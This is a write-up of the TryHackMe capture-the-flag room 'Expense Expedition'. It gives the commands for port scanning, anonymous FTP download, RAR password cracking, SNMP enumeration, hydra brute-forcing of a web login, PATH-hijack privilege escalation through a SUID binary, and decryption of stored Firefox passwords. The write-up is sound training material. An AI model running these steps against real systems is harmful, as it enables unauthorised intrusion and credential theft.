Expense Expedition Official Writeup (TryHackMe)

Aaryan Golatkar
4 min readDec 30, 2023


This is the official write-up of the Expense Expedition CTF room on TryHackMe.


Using Rustscan to scan the TCP Ports:-

rustscan -a [IP] -- -A
Rustscan results
Rustscan results

FTP Enumeration

From our Rustscan result, we found out that FTP has anonymous login enabled!

  • First, let’s turn off the passive mode!
  • Then, list the files in the FTP server.
  • We see a cs.rar file, let’s download it to our machine.
ftp anonymous@[IP]

ftp> passive
ftp> ls
ftp> get cs.rar
FTP Enumeration results
FTP Enumeration

Let’s extract the contents of the RAR file

File requires password

Let’s brute force for the password with John the Ripper

rar2john cs.rar > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Extracting the rar file, we get a cs.txt file. Let’s read it!

unrar x cs.rar
cat cs.txt
cs.txt contents

SNMP Enumeration

If you knew about the SNMP Protocol, you would’ve quickly got the hint! The “SNMP community string” is like a user ID or password that allows access to a router’s or other device’s statistics. SNMP community strings are used only by devices that support the SNMPv1 and SNMPv2c protocol.

First let’s confirm whether the SNMP port is enabled or not:-

nmap [IP] -sU -p 161 -Pn -T5
Nmap UDP Scan

Let’s enumerate SNMP. I will use the tool snmp-check :-

snmp-check [IP] -c somaiya

We find out some important details:-

  • Hostname: somaiya
  • Username: dhruv

So there’s a user “dhruv” on the system, but we still don’t have it’s password yet!

HTTP Enumeration

We need to fuzz for the subdirectories. I’ll be using ffuf for this

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u -ic -c
Directory Fuzzing

We find an uncommon expense directory. Visiting the directory, we find an expense-tracking website. Moving down the page, we find another user “aaryan”.

Now we have 2 users:-

  • aaryan
  • dhruv

Let’s brute force both the usernames for their passwords. Clicking on the login section above, we find the login page too.

Using hydra to brute force the password:-

hydra [IP] http-post-form -l dhruv -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt "/expense/login2.php:username=^USER^&password=^PASS^&login=Login:F=Username/Password Incorrect" -F -t 40

Although we couldn’t brute force aaryan’s password, we found the password for dhruv! Logging in just provides us with a dashboard page with expense and report categories, nothing fishy! Let’s use these credentials for logging into the system using SSH!

Gaining Access

ssh dhruv@[IP]
cat user.txt

Privilege Escalation

Horizontal Privilege Escalation

Let’s enumerate for SUID binaries

SUID Binaries

When we run this command, it pings to the localhost. Let’s run strings on this command to find out what it does internally!

strings /opt/path

Found the Vulnerability! The ping path is relative, not absolute. We can abuse the PATH variable to perform privilege escalation!

export PATH=/tmp:$PATH
echo "/bin/sh" > /tmp/ping
chmod 777 /tmp/ping

Awesome, we have successfully changed the userID (uid)! Although we aren’t the root user, we can enumerate “aaryan” user for vertical privilege escalation!

Vertical Privilege Escalation

When we move to the home directory of the “aaryan” user, we find a hidden .mozilla directory. This directory contains stored Firefox passwords!

  • Copy the entire directory onto our machine
  • We will use a tool called firefox_decrypt to decrypt the passwords
  • Usage:-
mv .mozilla/ mozilla/
python firefox_decrypt.py mozilla/

Congrats, we found the root password!

su root
cat /root/root.txt

And that is the entire machine pwned! Hope you enjoyed solving this CTF, it’s my first and one of many to come! Until then, auf wiedersehen!



Aaryan Golatkar

Cyber Security Enthusiast who has recently cracked the OSCP!